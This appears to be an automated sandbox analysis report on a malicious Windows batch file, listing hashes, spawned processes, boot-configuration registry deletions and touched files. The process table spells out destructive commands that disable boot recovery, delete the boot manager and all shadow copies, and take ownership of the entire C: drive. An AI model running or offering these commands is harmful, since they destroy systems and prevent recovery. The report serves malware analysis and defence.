Field | Value |
---|---|
File name | asdasd.txt |
Full analysis | https://app.any.run/tasks/f9536e7b-5471-4589-9101-5f74da90f690 |
Verdict | Malicious activity |
Analysis date | December 06, 2022, 00:40:00 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | |
MIME | text/x-msdos-batch |
File info | DOS batch file, ASCII text, with CRLF line terminators |
MD5 | 393457D7C5C099F33FC57B1149DFC0DB |
SHA1 | 9522B1B78A20557E57AE5C872604467717DEDE45 |
SHA256 | 48C7DBD6E1DD60BD379E74E317FACCFB2748A19C27BE38BE25F60B0470AFAFF7 |
SSDEEP | 6:hgWm6ghF+2OgF128PNSg/8fhrhy3Idw9PvJo9wsUZ7G3kbfb3bgYD:mLnQMQgEZV6ZiUBgkbrbgYD |

PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
856 | "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\Desktop\asdasd.txt" | C:\Windows\system32\NOTEPAD.EXE | — | Explorer.EXE |
1944 | "C:\Windows\System32\cmd.exe" /C "C:\Users\admin\Desktop\asdasd.bat" | C:\Windows\System32\cmd.exe | — | Explorer.EXE |
1464 | BCDEDIT /SET RECOVERYENABLED NO | C:\Windows\system32\bcdedit.exe | — | cmd.exe |
1912 | BCDEDIT /DELETE {BOOTMGR} /f /CLEANUP | C:\Windows\system32\bcdedit.exe | — | cmd.exe |
3140 | VSSADMIN DELETE SHADOWS /all -quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe |
3184 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
3852 | ATTRIB -R -A -S -H -I C:\*.* /S /D | C:\Windows\system32\attrib.exe | — | cmd.exe |
2548 | TAKEOWN /F C:\*.* /R /D Y | C:\Windows\system32\takeown.exe | — | cmd.exe |

PID | User | Company | Integrity Level | Description | Exit code | Version |
---|---|---|---|---|---|---|
856 | admin | Microsoft Corporation | MEDIUM | Notepad | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
1944 | admin | Microsoft Corporation | HIGH | Windows Command Processor | — | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1464 | admin | Microsoft Corporation | HIGH | Boot Configuration Data Editor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1912 | admin | Microsoft Corporation | HIGH | Boot Configuration Data Editor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
3140 | admin | Microsoft Corporation | HIGH | Command Line Interface for Microsoft® Volume Shadow Copy Service | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
3184 | SYSTEM | Microsoft Corporation | SYSTEM | Microsoft® Volume Shadow Copy Service | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
3852 | admin | Microsoft Corporation | HIGH | Attribute Utility | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
2548 | admin | Microsoft Corporation | HIGH | Takes ownership of a file | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |

Process (PID) | Operation | Key | Name | Value |
---|---|---|---|---|
— | write | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{345b46fd-a9f9-11e7-a83c-e8a4f72b1d33}\Elements\16000009 | Element | 00 |
— | delete key | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Description | (default) | |
— | delete key | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\11000001 | (default) | |
— | delete key | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\12000004 | (default) | |
— | delete key | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\12000005 | (default) | |
— | delete key | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\14000006 | (default) | |
— | delete key | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\23000003 | (default) | |
— | delete key | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\23000006 | (default) | |
— | delete key | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\24000001 | (default) | |
— | delete key | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\24000010 | (default) | |

PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
1944 | cmd.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb | — | — | — |
1944 | cmd.exe | C:\Windows\System32\winevt\Logs\Application.evtx | — | — | — |
1944 | cmd.exe | C:\Windows\System32\winevt\Logs\System.evtx | — | — | — |
856 | NOTEPAD.EXE | C:\Users\admin\Desktop\asdasd.txt | text | 393457D7C5C099F33FC57B1149DFC0DB | 48C7DBD6E1DD60BD379E74E317FACCFB2748A19C27BE38BE25F60B0470AFAFF7 |
1944 | cmd.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat | binary | BA71717819F680A38E9A3E0FFBE0C441 | 3059F02AA7DA426E3865B3A9304B02F04433BFCE846BE0094BF4B9E643F509CC |
1944 | cmd.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat | binary | CD3D3E4AF1EDAAD1A1109EC12782C31D | 1AE32F202F660612852BF691A9FAF21E96B0ECADEFF1B9B82054B9AA36F9505B |
1944 | cmd.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.14.gthr | text | 4B4892BCBCFF79413BA22D475D650885 | 94C2FDF7E2445A2F625D037D0C50C43FA759D162A212C2E9A738479A6776963F |
3852 | attrib.exe | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx | evtx | CBAD757EC11AE221377FAB60F6849540 | 7AF6F000FF721629F538DEF21BD2D071DF604225F61454276D4625958EC4A699 |
3852 | attrib.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.log | binary | 969890E3BBD644C98DC64CAEC7AED96F | A0D868C0F263847A1F11F80202CA12C04A056244AE4C63D050EEFD632EC4319A |
1944 | cmd.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 | binary | 213F03C41E5AAE316C55C2291F15CC0F | E0EF84E21BCE8E31A1CF9948B7AF57EDCB2F0DF4D321C61A18E3872C291E48BF |